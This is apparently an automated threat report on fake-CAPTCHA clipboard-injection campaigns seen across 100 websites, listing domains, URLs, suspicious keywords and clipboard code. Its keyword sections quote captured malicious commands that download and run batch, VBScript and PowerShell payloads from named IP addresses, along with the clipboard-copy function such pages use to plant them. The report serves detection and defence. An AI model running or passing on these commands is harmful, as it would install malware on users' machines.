
Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-12 Attack Patterns

100 Sites
22% Detection
2 PS Downloads

ClickGrab Threat Analysis Report - 2026-05-12

Generated on 2026-05-12 01:55:57

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 22
  • Unique domains encountered: 1,314
  • Total URLs extracted: 6,742
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 102

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 405 occurrences
  • www.maheshwaree.com: 320 occurrences
  • twitch.co.com: 318 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 227 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 198 occurrences
  • www.ccera-icar.org: 178 occurrences
  • www.evodigital.com.au: 156 occurrences
  • devblog.ezeelogin.com: 132 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences
  • 104.199.248.167: 71 occurrences

URL Pattern Analysis

reCAPTCHA imagery

11 occurrences across 8 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 time)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 time)
  • ...and 3 more distinct URLs

Font resources

72 occurrences across 60 distinct URLs

  • https://fonts.gstatic.com (5 times)
  • https://fonts.googleapis.com (3 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 55 more distinct URLs

CDN hosted scripts

9 occurrences across 9 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 time)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 time)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 time)
  • ...and 4 more distinct URLs

Google resources

116 occurrences across 63 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (32 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
  • https://fonts.googleapis.com (3 times)
  • https://www.googletagmanager.com/gtm.js?id= (3 times)
  • https://www.google (3 times)
  • ...and 58 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 519 (107 unique)

Keyword Categories

Social Engineering

42 unique keywords

  • CAPTCHA-verificatie-ID
  • verification_data
  • captcha-js
  • To better prove you are not a robot
  • captcha-box
  • verification-id
  • exec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;`
  • Checking if you are human
  • captcha_sid
  • ...and 32 more

Obfuscation Indicators

11 unique keywords

  • eval("clearTimeout(timeIn"+uid+")")
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval('var timeOut'+popupItems[i].id)
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval(frameContents)
  • eval(script)
  • eval(
  • eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
  • ...and 1 more

System Commands

33 unique keywords

  • exec(this.url)
  • wscript
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • powershell
  • exec /i http://inkbookwriters.com/verify';
  • Invoke
  • const command =
  • exec(ua) != null) { rv = parseFloat(RegExp.$1); } } else if (n.appName == "Netscape") { rv = 11; re = new RegExp("Trident/.rv:([0-9]+[.0-9])"); if (re.exec(ua) != null) { rv = parseFloat(RegExp.$1); } } } return rv; } })(window, document, navigator)-Invoke-WebRequest
  • ...and 23 more

Verification Text

3 unique keywords

  • hidden
  • ray id
  • Hidden

Technical Terms

18 unique keywords

  • CreateThread
  • odyssey
  • You will observe
  • WinHttpRequest
  • VirtualAlloc
  • .ps1
  • Ray ID
  • iex
  • bitmap
  • responseText
  • ...and 8 more

Most Frequent Keywords

  • hidden: 45 occurrences
  • robot: 38 occurrences
  • Robot: 28 occurrences
  • failed_to_retrieve: 21 occurrences
  • verification: 20 occurrences
  • CAPTCHA: 18 occurrences
  • Verification: 17 occurrences
  • CAPTCHA Verification: 16 occurrences
  • I am not a robot: 16 occurrences
  • You will observe: 16 occurrences
  • verification-id: 16 occurrences
  • To better prove you are not a robot: 16 occurrences
  • Verification ID: 15 occurrences
  • Ray ID: 14 occurrences
  • Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha-js, Captcha

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApp...
  • QSocks5SocketEnginePrivate
  • USERNAMEARInstallChoiceCreating
  • au/smartdetection/deviceverification/CF/path/captc...
  • controlSocketBytesWritten

Clipboard Manipulation Analysis

Detected clipboard manipulation in 102 instances.

document.execCommand Copy

Found in 42 snippets (41.2% of clipboard code)

Examples:

try { document.execCommand('copy')
document.execCommand("copy")
document.execCommand('copy')

Textarea Manipulation

Found in 45 snippets (44.1% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy) {
  const tempTextArea = document.createElement("textarea");
  tempTextArea.value = textToCopy;
  document.body.append(tempTextArea);
  tempTextArea.select();
  document.execCommand("copy");
  document.body.removeChild(tempTextArea);
}

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.